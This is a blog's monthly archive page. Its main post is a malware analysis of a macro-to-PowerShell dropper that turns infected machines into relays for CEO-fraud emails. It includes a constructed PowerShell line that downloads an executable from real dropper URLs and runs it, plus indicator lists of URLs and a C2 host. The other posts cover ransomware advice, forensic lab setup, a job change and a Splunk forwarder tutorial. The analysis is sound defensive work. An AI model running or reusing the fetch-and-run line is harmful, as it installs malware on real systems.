Monthly Archives: May 2018

MalHide: an interesting Malware sample

Today I'd like to share an analysis that I found interesting. I have called this sample MalHide, but you will see why only at the end of the post :D. I believe this is a quite interesting piece of malware for two reasons: first, it goes through several obfuscation stages using different techniques; second, it follows an attack path that is not new per se but is new for opportunistic malware families. The attacker does not want to steal information or take possession of or destroy the compromised system; instead, the attacker uses it as an email relay in order to hide the attacker's own network. It is remarkable that attackers are moving primarily towards fraud: having obtained privileged access to the victim machine, the attacker could perform many malicious actions, but among all the choices he decides to spawn an SMTP relay to send fraud emails anonymously. Based on my past experience this is quite weird, isn't it?!

Disclaimer: I am not going into detail on every step, since this is not a tutorial. Mostly I'd like to show that threats are getting more and more complex in a relatively short time, and that this attack path is quite unique, at least in my personal experience.

Everything started from an email attachment named "Nuovo Documento.doc", which was able to bypass every anti-spam and anti-malware engine the target had. The following image shows the initial stage, where the .DOC file appears benign but claims not to be compatible with the running Microsoft Word instance.

Stage 1. The sample as it appears on opening

The sample contains several macros. Many junk functions were injected on the VBA side to make life harder for reverse engineers, but fortunately the Microsoft VBA Editor included in the Microsoft Office suite implements a useful debugger. The AutoOpen() function is preserved and filled with code, and it took almost three seconds to figure out that it was malicious. The following image shows the VBA Editor debugging view, where it is possible to see the variable qZbTUw containing Base64-encoded PowerShell code. Here we are! The second stage is approaching the victim.

Stage 2. A running instance of PowerShell invoked by VBA

The PowerShell code was Base64-encoded and additionally obfuscated through a "variable mess". This technique is common among JavaScript developers, since their code runs client-side and obfuscation is (sort of) a way to protect it; here, though, it is simply an implementation of fileless staging: the attacker runs a PowerShell script directly from memory without saving it to disk, so it does not depend on the PowerShell execution policy for script files on disk, and it is much harder for antivirus to detect the infection stage. The script then fires the next stage to continue the infection. PowerShell ISE helps to reverse the dropped payload. The following images show the decoding process, from the single line of obfuscated code to the dropping URLs. I know, the images are small and almost impossible to read, but please click on them for a bigger view if you wish.

Stage 3. Decoding Powershell Drop-and-Execute


Stage 3. Decoded Powershell Drop-and-Execute
The analyst is now able to identify the dropping websites and block them (please refer to the IoC section)! The executed actions are quite standard: the script iterates over an array of dropping websites until one serves the payload. The iteration policy may differ from sample to sample (a pseudo-random seed, an incrementing index, round robin, and so on), but it is not relevant for this analysis, since all the possible dropper URLs have been decoded. The PowerShell command downloads 52887.exe from one of the dropping websites, places it at C:\Users\Public\52887.exe and finally runs it. Stage 4 has begun: a new PE sample has been executed. The following image shows Stage 4 dropping a further stage into C:\Windows\SysWOW64\fonduewwa.exe. This stage carries the dropped code within itself, so no network activity is involved. fonduewwa.exe is then executed.

Stage 4. 52887.exe dropping to C:\Windows\SysWOW64\fonduewwa.exe
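The decoding step shown in the Stage 3 images can be scripted. The block below is an added example, not code from the original post or from the sample: the payload in it is a constructed stand-in for the stage-2 one-liner that only mimics the shape described above (a list of dropper URLs tried in turn, a drop path under C:\Users\Public, then execution). The `'..'+'..'` string splitting and the `Split('@')` URL list are assumptions about the obfuscation, and mapping `$env:public` to C:\Users\Public assumes the Windows default; the URLs themselves are the dropper URLs from the IoC section.

```python
import base64
import re

# Constructed stand-in for the stage-2 PowerShell one-liner. It is NOT the
# script recovered from the analysed sample; it mimics only the shape described
# in the post (dropper URL list, drop path under C:\Users\Public, execute).
# The URLs are the dropper URLs from the post's IoC section.
CONSTRUCTED_STAGE2 = (
    "$u=('ht'+'tp://oddbods.co.uk/D6yd9x/@http://136.243.206.64/@ht'"
    "+'tp://166.63.0.27/').Split('@');"
    "$p=$env:public+'\\52887.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);"
    "Start-Process $p;break}catch{}}"
)

# Assumption: %PUBLIC% has its Windows default value.
PUBLIC_DIR = r"C:\Users\Public"


def encode_powershell(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects:
    UTF-16LE bytes, then Base64 (what the VBA stage hands to PowerShell)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Reverse of encode_powershell; the first step of the analysis."""
    return base64.b64decode(blob).decode("utf-16le")


_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def deobfuscate(script: str) -> str:
    """Collapse 'a'+'b' string concatenation until nothing changes, so URLs
    split across string literals become contiguous again."""
    while True:
        script, count = _CONCAT.subn(
            lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if count == 0:
            return script


def extract_iocs(script: str) -> dict:
    """Pull dropper URLs and the drop path out of the cleaned script."""
    urls = re.findall(r"https?://[^\s'\"@)]+", script)
    drop = re.search(r"\$env:public\+'([^']+)'", script)
    return {
        "urls": urls,
        "drop_path": PUBLIC_DIR + drop.group(1) if drop else None,
    }


def analyse(encoded: str) -> dict:
    """Full pipeline: Base64/UTF-16LE decode -> de-obfuscate -> IoCs."""
    return extract_iocs(deobfuscate(decode_powershell(encoded)))


if __name__ == "__main__":
    blob = encode_powershell(CONSTRUCTED_STAGE2)  # what the macro would pass
    for key, value in analyse(blob).items():
        print(key, value)
```

The decode step is the only part that is fixed by PowerShell itself (`-EncodedCommand` takes Base64 of UTF-16LE text); the de-obfuscation pass has to be adapted to whatever string tricks a given sample uses, and the extracted URLs are what you feed to the proxy blocklist.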

The newly dropped stage (fonduewwa.exe) performs the following steps:

1) It starts a service that acts as an SMTP client.
2) It connects to a Command and Control server, which provides the recipient email addresses, the SMTP relays (with credentials) and the email bodies to be sent.
3) It sends the emails, which are used for BEC (Business Email Compromise) fraud.

The following images show the Command and Control address. The first shows the Windows API calls used, while the second shows the connections opened directly on the infected machine.

Command and Control IP Address (click to make it bigger)

Command and Control DNS resolution (click to make it bigger)


The Command and Control (C2) listens on c-67-176-238-209.hsd1.il.comcast.net, which today resolves to 67.176.238.209. The C2 seems to answer HTTP requests carrying a specific set of cookies, as the following image shows. Replaying the communication with cookies reconstructed from sniffed internal traffic, the C2 returns about a kilobyte of encoded data.

Command and Control Communication through HTTP

From the C2 come actions, victim addresses, SMTP servers and passwords. The sample connects to the given SMTP relays, authenticates itself and sends emails to the victims. The following images prove that the attackers have plenty of credentials for SMTP relays around the globe.

Connection to real SMTP relays
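The behaviour just described (one workstation contacting the C2 and then fanning out to dozens of external SMTP relays) is also what a defender can look for in network logs. The detection below is an added example and not part of the original analysis: the flow records are constructed (a simplified `timestamp src dst dport` format, not captures from the infected network), the threshold of five distinct external SMTP destinations in ten minutes is an assumption to tune per environment, and the C2 indicators are the ones listed in the IoC section of this post.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

SMTP_PORTS = {25, 465, 587}
# C2 indicators taken from the IoC section of this post.
C2_INDICATORS = {"67.176.238.209", "c-67-176-238-209.hsd1.il.comcast.net"}
# Assumed thresholds: a workstation normally talks to one mail server, not many.
FANOUT_THRESHOLD = 5
WINDOW = timedelta(minutes=10)

# Constructed flow records ("timestamp src dst dport"), not real captures.
# 10.0.0.23 plays the infected host; 10.0.0.15 only uses the internal mail
# server 10.0.0.5; 10.0.0.31 sends one message through Gmail SMTP.
SAMPLE_LOG = """
2018-05-24T10:00:01 10.0.0.15 10.0.0.5 25
2018-05-24T10:00:05 10.0.0.23 67.176.238.209 80
2018-05-24T10:00:09 10.0.0.23 186.1.11.125 587
2018-05-24T10:00:12 10.0.0.23 192.243.105.21 25
2018-05-24T10:00:15 10.0.0.23 209.91.128.17 587
2018-05-24T10:00:19 10.0.0.23 64.8.70.103 465
2018-05-24T10:00:22 10.0.0.23 193.252.22.84 587
2018-05-24T10:01:02 10.0.0.15 10.0.0.5 25
2018-05-24T10:01:30 10.0.0.31 74.125.71.108 587
"""


def parse(log_text: str) -> list:
    """Turn the whitespace-separated records into (datetime, src, dst, port)."""
    records = []
    for line in log_text.strip().splitlines():
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return records


def is_external(addr: str) -> bool:
    """True for public IP addresses; hostnames are treated as external."""
    try:
        return ipaddress.ip_address(addr).is_global
    except ValueError:
        return True


def detect(log_text: str) -> list:
    """Return findings: C2 contacts plus hosts fanning out to many SMTP relays."""
    records = parse(log_text)
    findings = []

    # Rule 1: any contact with a known C2 indicator.
    for ts, src, dst, _ in records:
        if dst in C2_INDICATORS:
            findings.append({"rule": "c2_contact", "src": src, "dst": dst,
                             "ts": ts.isoformat()})

    # Rule 2: distinct external SMTP destinations per source within a
    # sliding time window (the relay fan-out signature).
    per_src = defaultdict(list)
    for ts, src, dst, dport in records:
        if dport in SMTP_PORTS and is_external(dst):
            per_src[src].append((ts, dst))
    for src, conns in per_src.items():
        conns.sort()
        for i, (t0, _) in enumerate(conns):
            relays = {d for t, d in conns[i:] if t - t0 <= WINDOW}
            if len(relays) >= FANOUT_THRESHOLD:
                findings.append({"rule": "smtp_relay_fanout", "src": src,
                                 "distinct_relays": len(relays),
                                 "first_seen": t0.isoformat(),
                                 "relays": sorted(relays)})
                break  # one finding per source is enough
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The fan-out rule is the durable one: the C2 address will change, but a workstation that authenticates to many unrelated SMTP servers in a few minutes looks the same whatever the next sample is called. Hosts that legitimately send mail to many servers (your own MTA, a newsletter box) go on an allowlist rather than raising the threshold for everyone.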

For now I will not disclose the usernames and passwords used to access the SMTP relays, but if you can prove to be the owner (or at least to be working for the company that owns) one of them, let's have a chat about it: many interesting things are happening in your network. The emails sent from the analysed sample target specific victims. It was pretty easy to figure out that we were facing a new attack vector! It looks like BEC (or CEO fraud) against specific targets. For those of you not familiar with this attack, I am copying the definition provided by SANS (here).
"Cyber criminals have developed a new attack called CEO Fraud, also known as Business Email Compromise (BEC). In these attacks, a cyber criminal pretends to be a CEO or other senior executive from your organization. The criminals send an email to staff members like yourself that try to trick you into doing something you should not do. These types of attacks are extremely effective because the cyber criminals do their research. They search your organization’s website for information, such as where it is located, who your executives are, and other organizations you work with. The cyber criminals then learn everything they can about your coworkers on sites like LinkedIn, Facebook, or Twitter. Once they know your organization’s structure, they begin to research and target specific employees. They pick their targets based on their specific goals. If the cyber criminals are looking for money, they may target staff in the accounts payable department. If they are looking for tax information, they may target human resources. If they want access to database servers, they could target someone in IT. Once they determine what they want and whom they will target, they begin crafting their attack. Most often, they use spear phishing. Phishing is when an attacker sends an email to millions of people with the goal of tricking them into doing something, for example, opening an infected attachment or visiting a malicious website. Spear phishing is similar to phishing; however, instead of sending a generic email to millions of people, they send a custom email targeting a very small, select number of people. These spear phishing emails are extremely realistic looking and hard to detect. They often appear to come from someone you know or work with, such as a fellow employee or perhaps even your boss. The emails may use the same jargon your coworkers use; they may use your organization’s logo or even the official signature of an executive.
These emails often create a tremendous sense of urgency, demanding you take immediate action and not tell anyone."

Below are a few examples of the emails received from the C2 and delivered through the analysed sample.


Here we are: another email has been sent, another piece of malware has been designed and developed, another analysis has been done, but this time it looks like the "malware economy" is seriously moving towards fraud; there is much more money in it than in information stealing, which is an ancient and romantic way to attack victims. Is this attack a significant example of where the new underground economy is heading? Is it a small and silent paradigm change, where the attacker was previously interested in your data in order to sell it, but is now more interested in defrauding third parties (such as companies) through you? I do not have such an answer here.

OK, now it's time to explain why I called this malware MalHide. It is a complex piece of malware that hides itself several times, but most importantly it has been developed to hide the attacker when sending emails, in a way that makes it impossible to trace the attacker's IP back through the attack path. So I believe MalHide is a fitting name :D

IoCs:

Samples (SHA-1):

  • 2f1f03b4afde643b2ed798e62f4718b0a285b8a8
  • e6b1a4b09613f1729782f1b2c04a30ad5ff30200
  • da39a3ee5e6b4b0d3255bfef95601890afd80709 (note: this is the SHA-1 of an empty file, so it is not a usable indicator)
Dropping URLs:
  • http://oddbods.co.uk/D6yd9x/
  • http://136.243.206.64
  • http://166.63.0.27
  • http://promoclass.it/ACCOUNT/Invoice-161021407-Invoice-date-052518-Order-no=-06146166318/
Local Path:
  • C:\Windows\SysWOW64\fonduewwa.exe
  • C:\Users\Public\52887.exe
C2:
  • 67.176.238.209
  • c-67-176-238-209.hsd1.il.comcast.net
SMTP relays (contacted to send emails; these are not malicious per se!):
  • 186.1.11.125 (smtp.echamorro.com.ni)
  • 192.243.105.21 (mail.mcmillins.com)
  • 209.91.128.17 (mail.maslack.com)
  • 64.8.70.103 (mail.tds.net)
  • 208.80.38.254 (pop.spiderhost.com)
  • 193.252.22.84 (smtp.orange.fr)
  • 199.103.57.167 (mail.mytravelclinic.com)
  • 149.115.16.7 (mail.transamericanengineers.com)
  • 68.99.120.8 (mail.coxmail.com)
  • 74.125.71.108 (smtp.gmail.com)
  • 76.12.209.196 (mail.gachivvis.com)
  • 107.14.166.78 (pop.biz.rr.com)
  • 64.39.128.67 (mail.syrupcity.net)
  • 107.180.3.218 (mail.rutledge-associates.com)
  • 165.212.120.200 (exchange.postoffice.net)
  • 64.35.208.130 (smtp.atcnet.net)
  • 207.204.50.27 (mail.cabstore.biz)
  • 216.52.72.118 (smtp.zoho.com)
  • 209.237.135.167 (mail.astarabatement.com)
  • 107.14.166.72 (smtp.twcny.rr.com)
  • 74.208.5.2 (smtp.1and1.com)
  • 209.123.49.115 (ssl.datamotion.com)
  • 208.92.193.92 (mail.hdap.ca)
  • 68.178.213.37 (smtp.secureserver.net)
  • 72.167.238.29 (smtp.secureserver.net)
  • 66.226.70.67 (pop.doubleolaser.com)
  • 205.178.146.249 (mail.boersmatravel.com)
  • 173.201.192.229 (smtpout.secureserver.net)
  • 64.59.128.135 (mail.shaw.ca)
  • 69.156.240.33 (mail.bestelectric.ca)
  • 38.123.104.66 (smtp.263.net)
  • 184.106.54.11 (smtp.emailsrvr.com)
  • 184.106.54.10 (secure.emailsrvr.com)
  • 209.237.135.166 (webmail5.myregisteredsite.com)
  • 74.125.133.16 (pop.googlemail.com)
  • 68.178.252.229 (smtpout.secureserver.net)
  • 64.20.48.173 (mail.expertforccna.com)
  • 72.47.216.15 (smtp.newalbanyelitedental.com)
  • 66.102.1.109 (pop.gmail.com)
  • 205.207.122.80 (mail.connection.ca)
  • 182.50.145.3 (smtpout.asia.secureserver.net)
  • 74.125.133.109 (imap.gmail.com)
  • 74.6.141.48 (smtp.att.yahoo.com)
  • 193.252.22.86 (smtp.orange.fr)
  • 68.178.252.101 (smtpout.secureserver.net)
  • 69.4.62.69 (pop.kerrcad.org)
  • 69.168.106.36 (smtp.windstream.net)
  • 188.125.73.26 (smtp.mail.yahoo.com)
  • 65.254.254.53 (mail.fatcow.com)
  • 65.254.254.52 (mail.fatcow.com)
  • 69.49.123.241 (mail.salzburginteriors.com)
  • 207.29.219.108 (mail.bayou.com)
  • 198.57.169.26 (bst-hosting.com)
  • 207.223.121.25 (mail.cloudopscenter.com)
  • 207.204.50.18 (mail.reliusmed.com)
  • 208.180.150.85 (mail.lrgriffin.com)
  • 217.15.86.61 (mail.roche-bobois.com)
  • 204.8.72.128 (mail.gdins.org)
  • 66.96.160.206 (pop.seriousfunnyc.org)
  • 66.175.58.40 (mail.mhpwq.org)
  • 207.204.50.11 (mail.prestonequipment.com)
  • 208.89.138.22 (m.ivenue.com)
  • 205.178.146.235 (mail.holstongases.com)
  • 68.15.34.125 (mail.jancompanies.com)
  • 212.82.101.35 (smtp.verizon.net)
  • 192.185.4.163 (gator4151.hostgator.com)
  • 137.118.58.15 (pop.totelcsi.com)
  • 207.69.189.23 (smtp.ix.netcom.com)
  • 68.87.20.6 (smtp.comcast.net)
  • 65.254.250.110 (smtp.franklintonnc.us)
  • 66.118.64.100 (smtp.citynet.net)
  • 173.203.187.10 (pop.emailsrvr.com)
  • 173.15.144.57 (mail.pembertonpolice.com)
  • 173.203.187.14 (mail.sbctransportation.com)
  • 72.52.250.187 (www11.qth.com)
  • 68.178.213.203 (smtp.secureserver.net)
  • 64.78.61.107 (mail16.intermedia.net)
  • 165.212.11.125 (smtp.postoffice.net)
  • 72.35.23.61 (pop.callta.com)
  • 206.188.198.65 (mail.bayoubendtx.com)
  • 65.254.250.100 (pop.powweb.com)
  • 64.29.151.235 (mail.arizoncompanies.com)
Sender email addresses used:
  • helene.valeze@wanadoo.fr
  • mehdi.audam@wanadoo.fr
  • dominique.derbord@wanadoo.fr

RISING SHIELD AGAINST RANSOMWARE ATTACKS



IN BRIEF: Both the City of Atlanta's network and the Roseburg school district recently suffered ransomware attacks. These are two examples among the many ransomware attacks facing organisations across the globe. This article provides three basic pieces of advice on how individuals and organisations can defend against ransomware.
--------------------------------------------

Early in 2018, Secureworks published a report titled "SamSam Ransomware Campaigns," which noted that the recent attacks involving SamSam have been opportunistic and lucrative and have impacted a wide range of organisations.

On March 22, 2018, City of Atlanta (GA) employees were ordered to turn off their computers to stop the malware from spreading through the network and encrypting data. A cybercriminal group demanded that the city pay about $51,000 in bitcoin, a cryptocurrency that allows for pseudonymous transactions online.

Federal agents advised the city not to pay the ransom, because paying is no assurance that the city's problem will be solved. The city then refused to pay the cybercriminals.



Following the attack, the city hired Secureworks, a Dell subsidiary, which has emerged as an early authority on the cybercriminal group "Gold Lowell". That group is blamed for a rash of attacks involving a variant of SamSam, the ransomware that struck Atlanta.


The total cost of the attack has yet to be calculated, but emergency contracts posted on the city's procurement website have a combined not-to-exceed amount of about $5 million, said Chief Operating Officer Richard Cox.

The city is still recovering from the attack; the municipal court is the only department whose computers haven't been brought back online. "We are in testing right now," Cox said, adding that he expects them to be operational in about 10 days.


The other incident took place in Roseburg, Oregon. The Roseburg Public Schools' computer system suffered a ransomware attack earlier this month, freezing access to the district's email system, website, and business and accounting software.

District officials say employee information was not accessed, but they don't know how much data they'll be able to get back.

"They don't hold out a lot of hope that they will be able to prosecute them, and they made it very clear to us that they couldn't help us recover our data," said Gerry Washburn, the Roseburg Schools Superintendent.

The FBI advised the district not to pay the ransom to recover the data. The district regained access to its email this week and plans to have the website back up as early as next week.

The Federal Bureau of Investigation (FBI) is now investigating the incident.



ADVICE: IMPROVING CYBERSECURITY.

There are a number of things one can put in place to improve cybersecurity. I will emphasise three among many, as follows.

Regularly update your operating system

Your operating system (OS) is the central command of your desktop, laptop or smartphone: it's the Captain Kirk of your devices. Unsurprisingly, it's a prime target for attackers. Access to your OS means cyberthieves "have the conn" of your computer: they can download, install and otherwise exploit your workstations. Taking control is how attackers steal your data.

Regularly updating your OS applies critical security fixes to your Windows, Mac or Linux software. Make your work life easier by setting up automatic OS updates. With this simple adjustment to your work habits, you'll "boldly go where no one has gone before" with your cybersecurity skills.

Get antivirus software, from reputable sources

You can do a lot to protect your employer by installing antivirus software, which helps protect work devices from phishing emails, spyware, botnets and other malware. But first, talk to your employer about getting a comprehensive cybersecurity solution. For your personal devices, consider getting your own antivirus software; most major antivirus brands offer free downloads of basic plans.

Back up your data regularly

Ransomware is on the rise, affecting businesses of every size and type. Cybercriminals break into computers, encrypt the data on them and hold it for ransom. It's a lucrative practice that costs employers millions every year, but regularly backing up your employer's data takes away the profit incentive.

Use both a physical drive and a cloud-based service for backups; if one is compromised, you'll still have the other. Keep at least one copy offline or otherwise out of reach of the machines it protects, because ransomware also encrypts any backup it can reach. Most cloud backups sync your data automatically and let you choose which folders to upload. Talk with your employer about which files need to be backed up and which can remain locally stored. Set up a regular maintenance schedule to review and test your backup plans.

Just like any of your work projects, cybersecurity is a team effort that needs everyone to contribute. These three cybersecurity tips for the workplace are just a jumping-off point for your overall improvement. Once you have the basics covered, expand your cybersecurity arsenal with additional tips and online resources. Make sure you're doing your part, and everyone at work will benefit.


DIGITAL FORENSICS LABORATORY



IN BRIEF: This article gives a brief overview of the key things to consider when establishing or building a digital forensics laboratory capable of supporting the investigation of digital crimes.
-------------------------------------------

A digital forensics laboratory is not only needed at the national level; companies can also have one in order to find answers to the cybercrime they may face.

Many countries have set out to build and strengthen dedicated digital forensics laboratories. I discussed Egypt's launch of a modern digital forensics laboratory in the article titled "EGYPT LAUNCHES NEW DIGITAL FORENSICS LAB".


This is due to the growth of such crimes, which require great care to investigate and to obtain proper answers. The key question is how much the people involved know about what needs to be considered when establishing these laboratories.



The following are just a few of the many things to consider when establishing a dedicated laboratory for the professional investigation of digital crimes.

LOCATION – Physical location: Care is needed when choosing the site for this special laboratory. The site must be close to essential emergency services, have a reliable electricity supply, and have access control so that nobody can enter the laboratory easily.

Furthermore, a digital forensics laboratory has two examination areas: one connected to the network, used for research and other tasks that require network access; the other not connected to the network, which is where the digital forensic examinations are actually performed.



Likewise, there must be an open area inside that can be used for interviewing suspects during an investigation and also for investigators' discussions and meetings.

GENERAL CONFIGURATION – General configuration: The laboratory should have equipment that keeps power available during outages, i.e. UPS units, network service, the essential software to support investigations, secure storage for exhibits (safe locker), shelving for other equipment and shelving for reference books in the laboratory.

Furthermore, equipment such as a forensics workstation (forensics tower), a printer, the various necessary cables, additional hard drives, together with other essential tools that can assist depending on the type of investigation the laboratory performs.


ESSENTIAL SOFTWARE – Software: The forensics laboratory is expected to have software such as Windows OS, Linux / Unix / Mac OS X / iMac operating systems, EnCase, FTK and other investigation support tools such as R-Drive, SafeBack and others that can help obtain answers in digital crime investigations, depending on the type of investigation you expect to carry out.

SECURITY RECOMMENDATIONS – Physical security: It is advised that the laboratory has only one door for entry and exit, that the laboratory windows cannot be opened, that there is a log book or system recording everyone who enters the laboratory and, if possible, a system or device that raises an alert when someone enters covertly (intrusion alarm system).


Furthermore, evidence lockers should be located in areas not easily accessible to unauthorised persons (restricted area, only accessible to lab personnel), kept under close supervision, and locked when not in use.

Bejtlich Joining Splunk


Since posting Bejtlich Moves On I've been rebalancing work, family, and personal life. I invested in my martial arts interests, helped more with home duties, and consulted through TaoSecurity.

Today I'm pleased to announce that, effective Monday May 21st 2018, I'm joining the Splunk team. I will be Senior Director for Security and Intelligence Operations, reporting to our CISO, Joel Fulton. I will help build teams to perform detection and monitoring operations, digital forensics and incident response, and threat intelligence. I remain in the northern Virginia area and will align with the Splunk presence in Tysons Corner.

I'm very excited by this opportunity for four reasons. First, the areas for which I will be responsible are my favorite aspects of security. Long-time blog readers know I'm happiest detecting and responding to intruders! Second, I already know several people at the company, one of whom began this journey by Tweeting about opportunities at Splunk! These colleagues are top notch, and I was similarly impressed by the people I met during my interviews in San Francisco and San Jose.

Third, I respect Splunk as a company. I first used the products over ten years ago, and when I tried them again recently they worked spectacularly, as I expected. Fourth, my new role allows me to be a leader in the areas I know well, like enterprise defense and digital operational art, while building understanding in areas I want to learn, like cloud technologies, DevOps, and security outside enterprise constraints.

I'll have more to say about my role and team soon. Right now I can share that this job focuses on defending the Splunk enterprise and its customers. I do not expect to spend a lot of time in sales cycles. I will likely host visitors in the Tysons area from time to time. I do not plan to speak as much with the press as I did at Mandiant and FireEye. I'm pleased to return to operational defense, rather than advise on geopolitical strategy.

If this news interests you, please check our open job listings in information technology. As a company we continue to grow, and I'm thrilled to see what happens next!

Trying Splunk Cloud

I first used Splunk over ten years ago, but the first time I blogged about it was in 2008. I described how to install Splunk on Ubuntu 8.04. Today I decided to try the Splunk Cloud.

Splunk Cloud is the company's hosted Splunk offering, residing in Amazon Web Services (AWS). You can register for a 15 day free trial of Splunk Cloud that will index 5 GB per day.

If you would like to follow along, you will need a computer with a Web browser to interact with Splunk Cloud. (There may be ways to interact via API, but I do not cover that here.)

I will collect logs from a virtual machine running Debian 9, inside Oracle VirtualBox.

First I registered for the free Splunk Cloud trial online.

After I had a Splunk Cloud instance running, I consulted the documentation for Forward data to Splunk Cloud from Linux. I am running a "self-serviced" instance and not a "managed instance," i.e., I am the administrator in this situation.

I learned that I needed to install a software package called the Splunk Universal Forwarder on my Linux VM.

I downloaded the 64-bit Linux 2.6+ kernel .deb file to the Downloads directory in my home directory on the Linux VM.

richard@debian:~$ cd Downloads/

richard@debian:~/Downloads$ ls

splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb

With elevated permissions I created a directory for the .deb, moved the file into it, changed into the directory, and installed the .deb using dpkg.

richard@debian:~/Downloads$ sudo bash
[sudo] password for richard: 

root@debian:/home/richard/Downloads# mkdir /opt/splunkforwarder

root@debian:/home/richard/Downloads# mv splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb /opt/splunkforwarder/

root@debian:/home/richard/Downloads# cd /opt/splunkforwarder/

root@debian:/opt/splunkforwarder# ls

splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb

root@debian:/opt/splunkforwarder# dpkg -i splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb 

Selecting previously unselected package splunkforwarder.
(Reading database ... 141030 files and directories currently installed.)
Preparing to unpack splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb ...
Unpacking splunkforwarder (7.1.0) ...
Setting up splunkforwarder (7.1.0) ...
complete

root@debian:/opt/splunkforwarder# ls
bin        license-eula.txt
copyright.txt  openssl
etc        README-splunk.txt
ftr        share
include        splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb
lib        splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-x86_64-manifest

Next I changed into the bin directory, ran the splunk binary, and accepted the EULA.

root@debian:/opt/splunkforwarder# cd bin/

root@debian:/opt/splunkforwarder/bin# ls

btool   copyright.txt   openssl slim   splunkmon
btprobe   genRootCA.sh   pid_check.sh splunk   srm
bzip2   genSignedServerCert.sh  scripts splunkd
classify  genWebCert.sh   setSplunkEnv splunkdj

root@debian:/opt/splunkforwarder/bin# ./splunk start

SPLUNK SOFTWARE LICENSE AGREEMENT

THIS SPLUNK SOFTWARE LICENSE AGREEMENT ("AGREEMENT") GOVERNS THE LICENSING,
INSTALLATION AND USE OF SPLUNK SOFTWARE. BY DOWNLOADING AND/OR INSTALLING SPLUNK
SOFTWARE: (A) YOU ARE INDICATING THAT YOU HAVE READ AND UNDERSTAND THIS

...

Splunk Software License Agreement 04.24.2018

Do you agree with this license? [y/n]: y

Now I had to set an administrator password for this Universal Forwarder instance. I will refer to it as "mypassword" in the examples that follow, although Splunk does not echo it to the screen below.

This appears to be your first time running this version of Splunk.

An Admin password must be set before installation proceeds.
Password must contain at least:
   * 8 total printable ASCII character(s).
Please enter a new password: 
Please confirm new password: 

Splunk> Map. Reduce. Recycle.

Checking prerequisites...
Checking mgmt port [8089]: open
Creating: /opt/splunkforwarder/var/lib/splunk
Creating: /opt/splunkforwarder/var/run/splunk
Creating: /opt/splunkforwarder/var/run/splunk/appserver/i18n
Creating: /opt/splunkforwarder/var/run/splunk/appserver/modules/static/css
Creating: /opt/splunkforwarder/var/run/splunk/upload
Creating: /opt/splunkforwarder/var/spool/splunk
Creating: /opt/splunkforwarder/var/spool/dirmoncache
Creating: /opt/splunkforwarder/var/lib/splunk/authDb
Creating: /opt/splunkforwarder/var/lib/splunk/hashDb
New certs have been generated in '/opt/splunkforwarder/etc/auth'.
Checking conf files for problems...
Done
Checking default conf files for edits...
Validating installed files against hashes from '/opt/splunkforwarder/splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-x86_64-manifest'
All installed files intact.
Done
All preliminary checks passed.

Starting splunk server daemon (splunkd)...  
Done

With that done, I had to return to the Splunk Cloud Web site, and click the link to "Download Universal Forwarder Credentials" to download a splunkclouduf.spl file. As noted in the documentation, splunkclouduf.spl is a "credentials file, which contains a custom certificate for your Splunk Cloud deployment. The universal forwarder credentials are different from the credentials that you use to log into Splunk Cloud."

After downloading the splunkclouduf.spl file, I installed it. Note that I pass "admin" as the user and "mypassword" as the password here; passing the password on the command line leaves it in the shell history, and omitting -auth makes splunk prompt for it instead, as the later commands show. After installing, I restart the universal forwarder.

root@debian:/opt/splunkforwarder/bin# ./splunk install app /home/richard/Downloads/splunkclouduf.spl -auth admin:mypassword

App '/home/richard/Downloads/splunkclouduf.spl' installed 

root@debian:/opt/splunkforwarder/bin# ./splunk restart
Stopping splunkd...
Shutting down.  Please wait, as this may take a few minutes.
.......
Stopping splunk helpers...

Done.

Splunk> Map. Reduce. Recycle.

Checking prerequisites...
Checking mgmt port [8089]: open
Checking conf files for problems...
Done
Checking default conf files for edits...
Validating installed files against hashes from '/opt/splunkforwarder/splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-x86_64-manifest'
All installed files intact.
Done
All preliminary checks passed.

Starting splunk server daemon (splunkd)...  
Done

It's time to take the final steps to get data into Splunk Cloud. I need to point the forwarder at forwarder management (the deployment server) in Splunk Cloud. Observe the input-prd-p-XXXX.cloud.splunk.com in the command. You obtain this (mine is masked with XXXX) from the URL of your Splunk Cloud deployment, e.g. https://prd-p-XXXX.cloud.splunk.com. Note that you have to add "input-" before the fully qualified domain name used by the Splunk Cloud instance.

root@debian:/opt/splunkforwarder/bin# ./splunk set deploy-poll input-prd-p-XXXX.cloud.splunk.com:8089

Your session is invalid.  Please login.
Splunk username: admin
Password: 
Configuration updated.

Once again I restart the universal forwarder. I'm not sure if I could have done all these restarts at the end.

root@debian:/opt/splunkforwarder/bin# ./splunk restart
Stopping splunkd...
Shutting down.  Please wait, as this may take a few minutes.
.......
Stopping splunk helpers...

Done.

Splunk> Map. Reduce. Recycle.

Checking prerequisites...
Checking mgmt port [8089]: open
Checking conf files for problems...
Done
Checking default conf files for edits...
Validating installed files against hashes from '/opt/splunkforwarder/splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-x86_64-manifest'
All installed files intact.
Done
All preliminary checks passed.

Starting splunk server daemon (splunkd)...  
Done

Finally I need to tell the universal forwarder to watch some logs on this Linux system. I tell it to monitor the /var/log directory and restart one more time.

root@debian:/opt/splunkforwarder/bin# ./splunk add monitor /var/log
Your session is invalid.  Please login.
Splunk username: admin
Password: 
Added monitor of '/var/log'.

root@debian:/opt/splunkforwarder/bin# ./splunk restart

Stopping splunkd...
Shutting down.  Please wait, as this may take a few minutes.
...............
Stopping splunk helpers...

Done.

Splunk> Map. Reduce. Recycle.

Checking prerequisites...
